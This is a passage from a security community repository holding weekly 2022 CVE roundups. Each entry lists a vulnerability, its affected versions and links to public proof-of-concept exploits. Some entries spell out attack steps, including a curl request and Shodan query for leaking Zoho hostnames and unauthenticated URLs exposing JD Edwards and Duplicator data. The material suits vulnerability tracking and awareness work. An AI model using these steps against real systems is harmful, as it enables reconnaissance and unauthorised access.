without any other requirements (normally an attacker should be at least authenticated). The vulnerability was possible due to use of Apache Batik with default settings for user-supplied SVG icon rasterization.\n \n### CVE Analysis : \n- This is a trail segment where we're experimenting the idea to track and filter out IT professional essential software and We're planning to provide CVE update for selected company such as Apple, Google, Microsoft, Github, Android, Linux(Ubuntu, kali etc), D-Link and CVE listed on Nation Cyber Awareness System. Let me know the if you have suggestion or want to add your favorite company this list.\n\n - Vulnerability in NVIDIA Data Plane Development Kit Affecting Cisco Products(Cisco Catalyst 8000V Edge Software, Adaptive Security Virtual Appliance (ASAv) & Secure Firewall Threat Defense Virtual (formerly FTDv))\n - Apple iOS, iPadOS, and macOS Input Validation Vulnerability CVE-2020-9934\n - Oracle WebLogic Server Unspecified Vulnerability CVE-2018-2628\n - Cisco Webex Meetings App (affected version <=42.7) Character Interface Manipulation Vulnerability. \n - Google Chromium Insufficient Data Validation Vulnerability CVE-2022-3075\n - Android OS Privilege Escalation Vulnerability CVE-2011-1823\n - [Ubuntu Security Patched.](https://ubuntu.com/security/notices) \n - Ubuntu 20.04 LTS : Linux kernel (Azure CVM) vulnerabilities.\n - Ubuntu 16.04 ESM & Ubuntu 14.04 ESM : Dnsmasq vulnerability, LibTIFF vulnerabilities, Linux kernel (HWE) vulnerabilities, linux-oracle - Linux kernel for Oracle Cloud systems.\n - D-Link DIR-816L RCE Vulnerability CVE-2022-28958\n - D-Link DIR-820L RCE Vulnerability CVE-2022-26258\n - D-Link Multiple Routers OS Command Injection Vulnerability CVE-2018-6530\n - D-Link DIR-300 Router Cleartext Storage of a Password Vulnerability CVE-2011-4723\n - NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability CVE-2017-5521\n---\n \n - [CVE-2022-34169 Analysis](https://noahblog-360-cn.translate.goog/xalan-j-integer-truncation-reproduce-cve-2022-34169/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp) & construction of [full exploit](https://gist-github-com.translate.goog/thanatoskira/07dd6124f7d8197b48bc9e2ce900937f?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)\n \n - Target: **Apache Xalan-J - A Java version implementation of an XSLT processor.**\n \n - Discription/Issue : In short a vulnerability in Xalan-J, an Apache project used by multiple SAML implementations, could allow arbitrary code execution and Felix Wilhelm(Security Researcher at Project Zero- Google) said that Xalan-J is vulnerable to an XSLT(a markup language that can transform XML documents into other formats, such as HTML.) Integer Truncation issue when processing malicious XSLT stylesheets.\n\n - [CVE-2022-31474 Wordpress](https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/)\n \n - Target: **WordPress plugin - BackupBuddy**\n - Affected Version : 8.5.8.0 and 8.7.4.1.\n - Fully Patched Version: 8.7.5\n \n - Discription/Issue : WordPress websites running BackupBuddy plugin with 140,000 active installations, is meant to help WordPress site administrators easily manage their backup operations. The plugin allows users to store the backups to various online and local destinations is vulnerability and CVE assigned to this vulnerability is CVE-2022-31474 with a CVSS score of 7.5, the exploited vulnerability exists because of an insecure method of downloading the backups for local storing, which enables unauthenticated attackers to download sensitive files from vulnerable sites.\n\n -[](https://github.com/emirpolatt/CVE-2022-31188)\n\n ---\n ### EXPLOIT : \n - [Mobile Mouse 3.6.0.4 Remote Code Execution](https://github.com/blue0x1/mobilemouse/blob/main/mobilemouse.py) \n - Exploit Author: Chokri Hammedi\n - Vendor Homepage: https://mobilemouse.com/\n - Software Link: https://www.mobilemouse.com/downloads/setup.exe\n - Version: 3.6.0.4\n - Tested on: Windows 10 Enterprise LTSC Build 17763\n - Discription: Mobile Mouse 3.6.0.4 could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \n\n
\n---\n
\n \n \nCVE's that matter [#Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 30th August - 07th September 2022 \n\n CVE POC exploit : CVE-2022-1388, CVE-2022-32250 and CVE-2022-2639.\n \n CVE Analysis : CVE-2022-30592, CVE-2021-38297, CVE-2022-31814, CVE-2022-21371, CVE-2022-24637, CVE-2022-33174, CVE-2022-1802, \n CVE-2022-23779, CVE-2022-24637, CVE-2022-35406 and Week#35 of Advisory Week Newsletter.\n \n \n\n\n - [CVE-2022-30592](https://github.com/efchatz/HTTP3-attacks)\n \n - Target: **QUIC-enabled servers (IIS, NGINX, LiteSpeed, Cloudflare, H2O, and Caddy)**\n - Discription/Issue : HTTP3-attacks : The current repository serves the purpose of sharing the scripts we used for educational usage. These attacks were a part of our study, and were tested against 6 different QUIC-enabled servers that were configured to communicate with HTTP/3. The http-stream script is the exploit of the CVE-2022-30592 issue that affected lsquic library. This script can also be exploited against Litespeed server.\n \n - [CVE-2021-38297 Analysis](https://jfrog.com/blog/cve-2021-38297-analysis-of-a-go-web-assembly-vulnerability/)\n \n - Target: **Golang (“Go”) programming language**\n - Patched : fixed versions (1.16.9, 1.17.2 or later).\n - Discription/Issue : @jfrog has elaborate the prerequisites for exploiting the Go vulnerability, which allows an attacker to override an entire Wasm (WebAssembly) module with its own malicious code and achieve WebAssembly code execution, and explore mitigation strategies for developers.\n \n- [CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n \n - Product: **ZOHO**\n - Discription/Issue : Zoho Internal Hostname Disclosure Vulnerability\n \n Step 1: curl -ILk https://IP:port/themes\n Step 2: Read the HTTP redirect response and anaylze the Location HTTP response header.\n BONUS #Shodan : title:\"ManageEngine Desktop Central 10\"\n\n- [CVE-2022-2639 PoC](https://drive.google.com/drive/folders/1f5YzKy_NChwlbYqHp-7Ih3RTSTBq9Ns6?usp=sharing)\n \n - Target: **Linux kernel openvswitch local privilege escalation.**\n - Tested on : 5.13, 5.4, 4.18.\n - Discription/Issue : Using pipe-primitive to exploit CVE-2022-2639, so no kaslr leak nor smap smep ktpi bypass is needed.\n\n- [CVE-2022-31814 Analysis](https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/)\n \n - Target/Product: **pfBlockerNG plugin**\n - Affected Version : <= 2.1.4_26\n - Discription/Issue : IHTeam undertook an independent security assessment of pfsense’s pfBlockerNG plugin version 2.1.4_26 and identified Unauthenticated Remote Command Execution as root (CVE-2022-31814).\n \n \n - [CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371)\n \n - Target/Product: **Oracle Fusion Middleware's Oracle WebLogic Server product **\n - Affected Version : 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0\n - Discription/Issue : The Oracle Fusion Middleware's Oracle WebLogic Server product (Web Container component) is vulnerable to local file inclusion. An easily exploited vulnerability could allow an unauthenticated attacker with HTTP network access to compromise Oracle WebLogic Server. A successful attack on this vulnerability, provide hackers complete access to Oracle WebLogic Server's whole data store or unrestricted access to sensitive data.\n\n - [CVE-2022-1388_PoC](https://github.com/alt3kx/CVE-2022-1388_PoC)\n \n - Target: **F5 BIG-IP RCE exploitation**\n - Affected Version : On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication.\n - Discription/Issue : F5 BIG-IP RCE exploitation (CVE-2022-1388)\n\n - [CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174)\n \n - Target/Product: **[Powertek PDUs](https://www.powertekpdus.com/)**\n - Affected Version : Powertek PDU 3.30.30\n - Discription/Issue : Powertek PDUs are high quality custom rack power distribution units from Powertek Corporation. There is a security vulnerability in Powertek PDU versions prior to 3.30.30. The vulnerability stems from the fact that the power distribution unit allows remote authorization to be bypassed in the web interface. The vulnerability can be exploited by an attacker to obtain the username and password in clear text.\n \n - [CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637)\n \n - Target/Product : **Open Web Analytics (OWA)**\n - Affected Version : <1.7.4.\n - Discription/Issue : Exploit for the Unauthenticated RCE in Open Web Analytics (OWA) <1.7.4. This work is based on https://devel0pment.de/?p=2494.\n\n\n - [CVE-2022-1802 + CVE-2022-1529 + CVE-2022-2200](https://github.com/mistymntncop/CVE-2022-1802)\n \n - Tested: **Firefox 100.0.1**\n - Discription/Issue : Firefox 100.0.1 RCE Object prototype, they could set undesired attributes on a JavaScript object, leading to privileged code execution.\n\n - [CVE-2022-35406 Writeups](https://medium.com/@mr.vrushabh/discovery-of-cve-2022-35406-303f4bca2742)\n - Discription/Issue : @mr.vrushabh found the CVE-2022-35406 on PortSwigger Web Security. This was a bug in Repeater/Intruder whereby a meta redirect would be followed when a user clicked the follow redirection button regardless of the content type or content disposition headers used on the target web site. This could disclose the referrer header. It was considered a low severity issue because the attack scenario involved multiple unlikely steps that involved user interaction. \n\n - In week 35 of Advisory Week Newsletter. You'll be seeing update on [Security Fixed on Apple, Microsoft, Github, Red Hat, Ubuntu, Mozilla and Nation Cyber Awareness System](https://advisoryweek.com/) \n\n
\n---\n
\n \n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 23rd - 30th August 2022\n\n \n CVE POC exploit : CVE-2022-32250, CVE-2022-37042, CVE-2022-38766, CVE-2022-23779, CVE-2022-32250-Linux-Kernel-LPE, \n CVE-2022-22715 , CVE-2022-37153, CVE-2022-2884, CVE-2022-2586 and CVE-2022-LPE-UAF.\n \n CVE Analysis : CVE-2022-20233, Multiple CVE in TENDA, CVE-2022-24787, CVE-2022-33318, CVE-2022-2884, CVE-2022-26377, \n CVE-2020-2733 and CVE-2022-30129. \n\n \n \n - [CVE-2022-32250 Exploit](https://github.com/theori-io/CVE-2022-32250-exploit)\n - Target: **Linux-Kernel**\n - Affected Version: Linux, before commit 520778042ccca019f3ffa136dd0ca565c486cedd (26 May, 2022) & Ubuntu <= 22.04 before security patch.\n \n - Discription :CVE-2022-32250 allows a local user to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free(UAF). \n\n- [N-day exploit for CVE-2022-2586 - Analysis](https://www.openwall.com/lists/oss-security/2022/08/29/5)\n - Target/Product: **Linux Kernel nft_boject UAF**\n - Affected Version : 3.16-rc1\n \n - Discription : The vulnerability is a Use-After-Free (UAF) in nf_tables, that makes it possible to escalate privileges from any user to root, and it is present since kernel version v3.16-rc1. To exploit this bug we need to enter a new network namespace to obtain `CAP_NET_ADMIN` (i.e: unprivileged user namespaces must be enabled, which is the case on most Linux distributions nowadays).\n\n - [CVE-2022-22715 POC](https://github.com/k0keoyo/my_vulnerabilities/tree/master/CVE-2022-22715)\n - Target: **Window OS**\n - Discription : In February 2022, Microsoft patched the vulnerability k0keoyo used in TianfuCup 2021 for escaping Adobe Reader sandbox, assigned CVE-2022-22715. The vulnerability existed in Named Pipe File System nearly 10 years since the AppContainer was born. We called it \"Windows Dirty Pipe\".\n - Root Cause : The vulnerability existed in Named Pipe File System Driver - npfs.sys, and the issue function is npfs!NpTranslateContainerLocalAlias. When we invoking NtCreateFile with a named pipe path, it will hit the IRP_MJ_CREATE major function of npfs, it called NpFsdCreate.\n\n - [CVE-2022-20233 Analysis](https://blog.quarkslab.com/attacking-titan-m-with-only-one-byte.html)\n - Product: **Titan M - A security chip introduced by Google in their Pixel smartphones, starting from the Pixel 3.**\n - Patched : Pixel Security update of June 2022.\n \n - Discription/Issue : On 2022-08-11, Google awared Quarkslab's engineers Damiano Melotti and Maxime Rossi $75,000, and Damiano Melotti and Maxime Rossi Bellom presented their Titan M vulnerability research project at the Black Hat USA 2022 Briefings in Las Vegas. You can also Check out this week Tools section find vulnerability on Titan M.\n\n - [Multiple CVE in TENDA](https://github.com/Darry-lang1/vuln/tree/main/Tenda/AC1206/4)]\n - Product: **Tenda AC1206 Router**\n - Affected Version : V15.03.06.23\n \n - Discription/Issue : Recenty, Multiple CVE has been assigned for Tenda AC1206. CVE that you must checkout CVE-2022-37798, CVE-2022-37799, CVE-2022-37800, CVE-2022-37801, CVE-2022-37802, CVE-2022-37803, CVE-2022-37804, CVE-2022-37805, CVE-2022-37806 & CVE-2022-37807.\n\n - [CVE-2022-24787 Report analysis](https://securitylab.github.com/advisories/GHSL-2022-001_Orckestra_C1_CMS/)\n - Target/Product: **Orckestra C1 CMS - Content Management System that scales out in the cloud.**\n - Version: v6.11\n \n - Discription : @JarLob (Jaroslav Lobacevski) reported an issue highlighting \"Deserialization of untrusted data(GHSL-2022-001) allows for Server Side Request Forgery (SSRF) or arbitrary file truncation.\"\n \n - [CVE-2022-38766 POC]\n - Target/Product: **Renault 2021 ZOE Electronic car**\n \n - Discription/Issue : This vulnerability raised the question of whether ZOE electric vehicles are safe form RF hacking. For this reason, the actual ZOE vehicle released this year was targeted and attacked. A study was also conducted on how this attack bypass the rolling codes, a defense technique of RF hacking, and a lot of thought was needed about the handling method in case the car breaks down.\n \n - [CVE-2022-37042 POC Exploit](https://github.com/aels/CVE-2022-37042)\n - Target: **Zimbra**\n - Discription : Zimbra CVE-2022-37042 Nuclei weaponized template shell path: /public/formatter.jsp\n \n - [CVE-2022-23779 Proof-of-Concept Exploit](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n - Target: **ZOHO**\n - Discription : Internal Hostname Disclosure Vulnerability\n\n - [CVE-2022-33318 - Remote Code Execution in ICONICS Genesis64](https://github.com/0vercl0k/paracosme)\n - Target: **Genesis64 suite**\n - Version: 10.97.1\n \n - Discription : Paracosme (Remote Code Execution in ICONICS Genesis64 exploit) was demonstrated during the Pwn2Own 2022 Miami contest that took place at the S4x22 Conference. Paracosme exploits a use-after-free issue found in the GenBroker64 process to achieve remote code execution on a Windows 21H2 x64 system.At a high level, the GenBroker64 process listens on the TCP port 38080 and is able to deserialize various packets after a handshake has been done with a client. The isue I found is in the code that handles reading a VARIANT from the network socket. Basically a variant is a type and a value. The function seems well-written at first sight, and takes efforts to only unpacks certain types. \n \n\n - [CVE-2022-2884](https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/)\n - Target: **GitLab**\n - Version: 15.3.1, 15.2.3, 15.1.5\n \n - Discription : There is a critical vulnerability with the identifier CVE-2022-2884 and a score of 9.9 in versions 11.3.4 to 15.1.4 and between 15.2 and 15.2.3, as well as 15.3 community and enterprise versions, which allows the hacker to execute code remotely. provides This vulnerability occurs in GitHub import.\n\n\n - [CVE - 2022-LPE-UAF](https://github.com/greek0x0/2022-LPE-UAF )\n - Target: **Linux kernel**\n \n - Discription : Security researchers discovered 3 vulnerabilities in the Linux kernel that could allow a local attacker to elevate privileges and potentially execute malicious code. [Paper on Dirtycred by Zhenpeng](https://zplin.me/papers/DirtyCred-Zhenpeng.pdf)\n\n\n - [CVE-2022-26377 Analysis](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/)\n - Target: **Apache HTTPd**\n - Title : apache-httpd-ajp-request-smuggling :\n \n - Discription : This article introduces a new attack method and idea for AJP, which can be used in applications such as Apache HTTPd proxy_ajpThe attack surface of the reverse proxy for Tomcat AJP, the product self-developed AJP reverse proxy, and the horizontal expansion to FastCGI and other protocols can also be attempted (of course, no other protocols have been dug). \n\n - [CVE-2020-2733 Analysis](https://redrays.io/cve-2020-2733-jd-edwards/)\n - Product: ** Oracle JD Edwards EnterpriseOne Tools**\n - Affected Version : < 9.2\n \n - Discription/Issue : The vulnerability was discovered in the Oracle JD Edwards Management portal. To reproduce the vulnerability, you need to open (without authentication) the following [URL](http://JDEdwards:8999/manage/fileDownloader?sec=1) When you open the URL, you can see pseudo-random text in the page. ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB. After analyzing the JD Edwards jar files, Researcher discovered that this pseudo-random data is – THE ENCRYPTED ADMIN PASSWORD!\n\n - [CVE-2022-30129 - Analysis](https://blog.sonarsource.com/securing-developer-tools-argument-injection-in-vscode/)\n - Target/Product: **Microsoft - Virtual Studio Code**\n - Affected Version : 1.67.1\n \n - Discription/Issue : Argument Injection in Visual Studio Code : The vulnerability can be used to target developers that have the Visual Studio Code IDE installed. Upon clicking on a malicious link crafted by an attacker, victims are prompted to clone a Git repository in Visual Studio Code. \n\n
\n--- \n
\n \nCVE's that matter Week 03-> 16th - 22nd Aug 2022** \n\n\n- [CVE-2022-1802 POC Exploit](https://github.com/mistymntncop/CVE-2022-1802)\n - Target: **Amazon-Linux 2 : thunderbird Package**\n - Version Affected: <0:91.9.1-1.amzn2.0.1 \n - Discription : The Mozilla Foundation Security Advisory describes this flaw as:\n An attacker could have sent a message to the parent process where the contents were used to double-index into a JavaScript object, leading to prototype pollution and ultimately attacker-controlled JavaScript executing in the privileged parent process. (CVE-2022-1529).\n\n- [CVE-2022-35742](https://blog.78researchlab.com/b9c80d00-d935-43b1-8805-969000df301d)\n - Target: **Window Outlook**\n - Patched on August 2022\n - Discription : Denial of serice at Outlook where attacker can triger a vulnerability by sending crafteted email and vulnerability occurs during MIME property parsing.\n\n - [CVE-2021-43811 POC](https://github.com/s-index/CVE-2021-43811)\n - Target: **awslabs/sockeye**\n - Version: < 2.3.24 \n - Discription :Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. The issue is fixed in version 2.3.24.\n\n- [CVE-2020-6369 Patch bypass](https://redrays.io/cve-2020-6369-patch-bypass/)\n - Target: **CA Introscope Enterprise Manager’s**\n - Version Affected :\n WILY_INTRO_ENTERPRISE 9.7\n WILY_INTRO_ENTERPRISE 10.1\n WILY_INTRO_ENTERPRISE 10.5\n WILY_INTRO_ENTERPRISE 10.7\n - Discription : CA Introscope Enterprise Manager’s releases 10.7.0.306 or lower, allow unauthenticated attackers to bypass the authentication if the administrator has not changed the default passwords for Admin and Guest. This may impact the confidentiality of the service.\n\n - [CVE-2022-36966]\n - Target: **Orion platform**\n - Discription : CVE-2022-36966 has been assigned as the Zero-Day for the escalation of privilege in Orion platform.The exploit requires internal + initial access. Details will be shared as SolarWinds provides official feedback. The vulnerability was identified by researcher 'Asim Khan'\n\n\n - [1day to 0day(CVE-2022-30024) on TP-Link TL-WR841N](https://blog.viettelcybersecurity.com/1day-to-0day-on-tl-link-tl-wr841n/)\n - Target: **TP-Link TL-WR841N devices**\n - Discription : Vulnerabilities on TP-Link TL-WR841N devices CVE-2020-8423 \tData parsing,CVE-2022-24355 \tFile extensions handling & CVE-2022-30024 \tAssignment data\n\n\n - [CVE-2022-27255 POC](https://github.com/infobyte/cve-2022-27255/tree/main/exploits_nexxt)\n - Target: **Realtek eCos SDK SIP ALG buffer overflow**\n - Vulnarable Device : \n \n Nexxt Nebula 300 Plus\n Tenda F6 V5.0\n Tenda F3 V3\n Tenda F9 V2.0\n Tenda AC5 V3.0\n Tenda AC6 V5.0\n Tenda AC7 V4.0\n Tenda A9 V3\n Tenda AC8 V2.0\n Tenda AC10 V3\n Tenda AC11 V2.0\n Tenda FH456 V2.0\n Zyxel NBG6615 V1.00\n Intelbras RF 301K V1.1.15\n Multilaser AC1200 RE018\n iBall 300M-MIMO (iB-WRB303N)\n Brostrend AC1200 extender\n MT-Link MT-WR850N\n MT-Link MT-WR950N\n Everest EWR-301\n D-Link DIR-822 h/w version B\n Speedefy K4\n Ultra-Link Wireless N300 Universal Range Extender\n Keo KLR 301\n QPCOM QP-WR347N\n NEXT 504N\n Nisuta NS-WIR303N (probably V2)\n Rockspace AC2100 Dual Band Wi-Fi Range Extender\n KNUP KP-R04\n Hikvision DS-3WR12-E\n\n - Discription : PoC and exploit code. The PoC should work on every affected router, however the exploit code is specific for the Nexxt Nebula 300 Plus router. For More - https://github.com/infobyte/cve-2022-27255\n\n\n - [CVE-2022-37393 Technical Analysis](https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis)\n - Target: ** Zimbra Collaboration Suite**\n - Discription : We are not aware of active exploitation of CVE-2022-37393 at this time, but it could be very difficult to detect successful exploitation because it grants root access.\n\n\n - [CVE-2022-21881 POC](https://github.com/theabysslabs/CVE-2022-21881)\n - Target: **TianfuCup 2021**\n - Discription : POC of CVE-2022-21881 exploited at TianfuCup 2021 to escape Chrome Sandbox \n\n - [CVE-2022-29805 Analysis](https://www.whiteoaksecurity.com/blog/fishbowl-disclosure-cve-2022-29805/)\n - Target: **Fishbowl**\n - Version: <2022.4.1.\n - Discription : White Oak Security discovered an instance of Fishbowl Inventory that was vulnerable to a Java deserialization vulnerability, resulting in unauthenticated remote code execution. \n \n - [CVE-2022-37042 Zimbra Authentication Bypass](https://github.com/projectdiscovery/nuclei-templates/pull/5134/files)\n - Target: **Zimbra**\n - Discription : Nuclei Zimbra: Release of CVE-2022-37042 Zimbra Authentication Bypass Causing RCE Non-Destructive Vulnerability Detection Template.\n \n
\n---\n
\n \nCVE's that matter Week 02-> 9 - 16 Aug 2022\n\n\n - [CVE-2022-27255](https://github.com/infobyte/cve-2022-27255)\n - Target: **Realtek eCos SDK SIP ALG buffer overflow.**\n - Discription : This repository contains de materials for the talk \"Exploring the hidden attack surface of OEM IoT devices: pwning thousands of routers with a vulnerability in Realtek’s SDK for eCos OS.\", which was presented at DEFCON30.\n\n - [CVE-2022-30216]()\n - Target: **Windows Server service**\n - Version: Windows 11/Server 2022 machine.\n - Discription : PoC of the srvsvc auth coerce vulnerability [(CVE-2022-30216) : Authentication coercion of the Windows “Server” service.](https://www.akamai.com/blog/security/authentication-coercion-windows-server-service)\n\n\n - [CVE-2022-36446 POC](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE)\n - Target: **Webmin**\n - Version: < 1.997. \n - Discription : A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin.\n\n - [DashOverright POC]()\n - Target: **VMware vRealize Operations Manager**\n - Version : <= 8.6.3.19682901. \n - Discription : This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROPS) that impacts versions <= 8.6.3.19682901. \n This exploit chains three vulnerabilities that have been patched.\n CVE-2022-31675 - MainPortalFilter ui Authentication Bypass\n CVE-2022-31674 - SupportLogAction Information Disclosure\n CVE-2022-31672 - generateSupportBundle VCOPS_BASE Privilege Escalation\n\n - [CVE-2021-43908 Analysis](https://blog.electrovolt.io/posts/vscode-rce/)\n - Target: **Virtual Studio Code**\n - Discription: Visual Studio Code - Remote Code Execution in Restricted Mode (CVE-2021-43908)\n \n - [CVE-2022-31101 POC](https://github.com/karthikuj/CVE-2022-31101)\n - Target: **PrestaShop** is the universal open-source software platform to build your e-commerce solution. \n - Discription: Exploit for PrestaShop bockwishlist module 2.1.0 SQLi \n\n - [CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980)\n - Target: **apache**\n - Version: \t2.2.4 to 2.7-2\n - Discription: Apache Commons RCE can use url,dns,script key-words to connect any server.\n\n - Micosoft security update that matter : \n - [CVE-2022-34715 POC](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715) - Discription: Windows Network File System Remote Code Execution Vulnerability.\n - [CVE-2022-30133](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30133) - Discription: Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (Disable port 1723)\n - [CVE-2022-34713](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713) - Discription: 0-days DogWalk- Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\n\n - [CVE-2020-0796](https://github.com/msuiche/smbaloo)\n - Target: **Windows ARM64**\n - Discription: A CVE-2020-0796 (aka \"SMBGhost\") exploit for Windows 10 18362 ARM 64-bit (AArch64)\n \n- [Vulnerabilities in Cisco Small Business products](https://pastebin.com/8w2VVXn2)\n - CVE-2022-20842 \n - CVE-2022-20827 \n - CVE-2022-20841\n\n- [Multiple Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software has not been FIXED](https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/)\n - Cisco ASDM binary packages \t\n - CVE-2022-20829 \tNot fixed** \n - None(CVE not Assigned Yet) \tNot fixed\n - Cisco ASDM (7.17.1.155). \t\n - CVE-2022-20651 \tFixed\n - Cisco ASDM client (fixed in ASDM 7.18.1.150, but Rapid7 has informed Cisco that the issue was in fact not addressed and remains unfixed. \n - CVE-2021-1585 CSCvw79912 \tNot fixed**\n - Cisco ASDM binary package code execution mechanism to be used with CVE-2022-20829 or CVE-2021-1585. \t \n - CSCwc21296 \tFixed\n - Cisco ASA-X with FirePOWER Services \n - CVE-2022-20828 \tFixed in most maintained versions\n - Cisco FirePOWER module before 6.6.0 \t\n - CSCvo79327 \tFixed in most maintained versions\n - >= 7.0. Not fixed on ASA.\n - Cisco ASA with FirePOWER Services \n - None \tNot fixed\n - Some Cisco FirePOWER module\n - None \tNot fixed\n\n
\n---\n
\n \nCVE's that matter Week 01 -> 2 - 9 Aug 2022\n\n\n - [CVE-2022-36446 Exploit](https://www.exploit-db.com/exploits/50998)\n - Target: **Webmin**\n - Version: 1.996\n - Discription: [Remote Code Execution (RCE) Authenticated During Install New Packages.](https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165)\n \n - [CVE-2022-2552 Exploit](https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2552)\n - Target: **WordPress Plugin Duplicator**\n - Version: <=1.4.7\n - Discription : Unauthenticated System Information Disclosure \n - #Proof-Of-Concept: 1-System information.\n Some system information is obtained using the \"view\" parameter.\n http://[PATH]/backups-dup-lite/dup-installer/main.installer.php\n \n - [An **CVE-2022-29582-io-uring** subsystem of the Linux kernel vulnerability](https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/)\n \n - [**CVE-2022-35405 Zoho** Password Manager Pro XML-RPC RCE](https://xz-aliyun-com.translate.goog/t/11578?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)\n\n - [**CVE-2022-1215 - Analysis**](https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak.html)\n - Target: **libinput library**\n - Version: < 1.20.0\n - Discription:nday exploit - A format string vulnerability exists in the libinput library, \n allowing a local attacker to achieve arbitrary code execution in the context of libinput.\n\n- [CVE-2022-34918 LPE POC](https://github.com/veritas501/CVE-2022-34918)\n - Target: *Linux Kernal module*(4 Aug 2022) \n - Version span: v5.8 ~ v5.19 \n - Discription: netfilter nf_tables local privilege escalation analysis \n \n - [Multiple CVE's on VMWARE miltiple products and a critical(9.8) CVE-2022-31656](https://www.vmware.com/security/advisories/VMSA-2022-0021.html)\n - Target: **VMWARE**\n - Version: 21.08.0.1, 21.08.0.0\n - Discription: VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.\n \n- [nex-forms-exploit](https://github.com/ehtec/nex-forms-exploit)\n - Target: *Wordpress plugin*(2nd August 2022)\n - Versions: <= 7.9.6)\n - Discription: Authenticatd SQL injection vulnerability in the \"NEX Forms\" Wordpress plugin .\n \n- [CVE-2022-2185](https://github.com/star-sg/CVE/tree/master/CVE-2022-2185)\n - Target: **GitLab**\n - Version: GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1\n - Exploit Written By: [Nguy?n Ti?n Giang](https://github.com/testanull)\n\n
\n" }, { "path": "ResetCybersecuirty/CVE's/POC_collecctions.md", "content": "- SkyLink\n- Red Teaming TTPs // Developing a POC for CVE-2022-26923 with Powershell and CommandoVM - https://youtu.be/z86tfhMU_vU\n- K8 Exploit Collections - https://github.com/k8gege/K8tools\n\n\n" }, { "path": "ResetCybersecuirty/CVE's/Readme.md", "content": "# Security Patched, CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)

\"/Pentesting-Bugbounty//ResetCybersecuirty/CVE's/Readme.md\"

\n
\n \nA collection on latest proof-of-concept exploit scripts and analysis of latest patched CVE. \n \n > Why you ask becuase There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited and this will makes you and your organization vulnerable with latest vulnerabilities. \n \n \n - Every Week our team filter out latest IT security CVEs POC, update on patchted security, writeups & analysis of cve that has been discovered, written or found by community members. Format we follow : \n \n\n\n \n # Security Patched within a Week: Latest IT security vulnerability patched within this week on selected company such as Apple, Google, :\n # CVE Analysis: CVE analysis and poc for analysis.\n # Poc Exploit : Tracking the recetly discovered PoC of old & new CVE. \n \n - [CVE]\n - Target/Product: ** **\n - Affected Version/ Patched :\n - Discription/Issue/Flaw :\n \n
